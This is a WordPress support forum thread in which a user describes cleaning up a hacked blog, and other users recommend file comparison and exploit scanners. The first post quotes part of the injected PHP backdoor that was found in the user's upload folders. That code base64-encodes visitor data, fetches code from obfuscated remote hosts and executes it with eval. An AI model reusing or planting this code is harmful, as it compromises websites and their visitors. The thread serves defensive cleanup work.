Support » Fixing WordPress » 2.5.1 Hacked

  • Resolved barnyoka


    I discovered recently, thanks to Google Alerts, that my WP blog had been hacked. Actually, I had 3 blogs on my domain, one old one unused, another one dormant but waiting (2.3 I think), and my current one, 2.5.1. Today I’m cleaning up the mess.

    First I completely deleted the unused blog. Then, I took a good look at the dormant one. I compared the files with the downloaded files in my Applications folder of WP 2.5.1. Obviously, there were some discrepancies due to the difference in versions, but I found something else there that was so obviously inappropriate I felt I had to follow up on it. Then, checking my current blog, I discovered the same thing. I’m now working to clean that up, and will upgrade the dormant blog as well.

    In the meantime, I want to tell you what I found. In the Uploads folders in particular, but elsewhere as well, were numbered files – 5 or 6 digits comprised the file names and an accompanying .htaccess file.

    The numbered files all contained the same code, shown here in part because I don’t want inadvertently to teach anyone else how to use this:

    $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”.base64_encode($g).”.”.base64_encode($h).”.$s.”.base64_encode($i).”.”.base64_encode($j); if ((include(base64_decode(“aHR0cDovLw==”).base64_decode(“d3d3My5yc3NuZXdzLndz”).”/?”.$str))){} else if (include(base64_decode(“aHR0cDovLw==”).base64_decode(“d3d3My54bWxkYXRhLmluZm8=”).”/?”.$str));else if ($c=file_get_contents(base64_decode(“aHR0cDovLzcucnNzbmV3cy53cy8/”).$str))eval($c);else{$cu=curl_init(base64_decode(“aHR0cDovLzcucnNzbmV3cy53cy8/”).$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

    Thanks to other posts in the support forums, I was on the alert for the base64 stuff, and because there were other Upload folders that did not contain these files, I figure this is the stuff that has been put into my domain by some outsider. Can anyone verify this is so?

    Also, I found the word eval at the beginning of the class-pclzip.php file, and it’s not in the original I have, so I will be changing that as well. I have not yet checked ALL the php files, and if anyone knows which ones are most likely to have been hit, please do share.

    I hope this information is useful to others.


Viewing 4 replies - 1 through 4 (of 4 total)
  • whooami



    check your wp-includes/functions.php

    2 bits says its been altered in atleast one place — maybe 2.

    If youre interested, and doing comparisons on a windows box, I reccommend wingrep, downloadable from the .com domain of the same name.

    PS: consider yourself lucky, if for no other reason than this: 2 hacked sites that I cleaned up (neither of which were my own) had between 1000 and 3000 files inside a directory.

    There is a WordPress Exploit Scanner that can help you identify compromised files. This plugin searches the files and database of your website for signs of suspicious activity.

    Unmask Parasites

    Thank to you both! Unmask Parasites says all sites are now clear. I have downloaded the Exploit plugin and will implement that asap. My functions.php file seems clean. Now all I have to do is get my dormant blog to run after upgrade, but I’m grappling with that under another post in the Support Forum. Thanks again for all your help!


    Unmask Parasites is only in beta stage and there’s no guarantee it catches all exploits. You should use some server side scanners like the WordPress Exploit Scanner – it can check theme files and your database for known exploits.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘2.5.1 Hacked’ is closed to new replies.